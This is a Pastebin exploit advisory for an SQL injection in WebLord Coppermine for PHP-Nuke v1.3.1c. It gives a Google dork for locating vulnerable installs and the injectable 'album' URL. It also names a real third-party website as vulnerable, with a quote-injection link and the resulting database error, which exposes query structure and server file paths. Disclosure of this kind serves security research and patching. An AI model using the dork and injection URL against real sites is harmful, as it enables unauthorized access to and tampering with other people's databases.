Advertisement
KingSkrupellos

WebLord Coppermine for PHP-Nuke v1.3.1c SQL Injection

Jun 13th, 2019
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.14 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : WebLord Coppermine for PHP-Nuke v1.3.1c SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/06/2019
  7. # Vendor Homepage : pcnuke.com - weblord.it - phpnuke.org
  8. # Information Link : forum.coppermine-gallery.net
  9. # Software Version : v1.3.1c
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : intext:Engine PHP-Nuke - Powered by WL-Nuke site:it
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. WebLord Coppermine for PHP-Nuke v1.3.1c is prone to an SQL-injection vulnerability because
  25. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  26. Exploiting this issue could allow an attacker to compromise the application, access or
  27. modify data, or exploit latent vulnerabilities in the underlying database.
  28. A remote attacker can send a specially crafted request to the vulnerable application and
  29. execute arbitrary SQL commands in application`s database. Further exploitation of this
  30. vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. ###################################################################
  34.  
  35. # SQL Injection Exploit :
  36. **********************
  37. /sci/modules.php?name=coppermine&file=thumbnails&op=modload&album=[SQL Injection]&page=&sort=ra
  38.  
  39. /PATH-HERE/modules.php?name=coppermine&file=thumbnails&op=modload&album=[SQL Injection]&page=&sort=ra
  40.  
  41. ###################################################################
  42.  
  43. # Example Vulnerable Sites :
  44. *************************
  45. [+] sciclubsesto.it/sci/modules.php?name=coppermine&file=thumbnails&op=modload&album=1%27&page=&sort=ra
  46.  
  47. ###################################################################
  48.  
  49. # Example SQL Database Error :
  50. ****************************
  51. There was an error while processing a database query.
  52. While executing query "SELECT pid, filepath, filename, p.title, keywords,
  53. url_prefix, filesize, pwidth, pheight, ctime, p.aid, p.title, caption, hits, description
  54. from nuke_cpg_pictures as p INNER JOIN nuke_cpg_albums AS a ON
  55. (a.aid = 3 AND visibility IN (0,3,3,10001)) WHERE p.aid='3' AND
  56. approved='YES' ORDER BY pic_rating ASC LIMIT -12 ,12" on 0
  57. mySQL error: You have an error in your SQL syntax; check the manual that
  58. corresponds to your MySQL server version for the right syntax to use near '-12 ,12' at line 1
  59. File: /web/htdocs/www.sciclubsesto.it/home/sci/modules/coppermine/include/functions.inc - Linea: 107
  60.  
  61. ###################################################################
  62.  
  63. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  64.  
  65. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement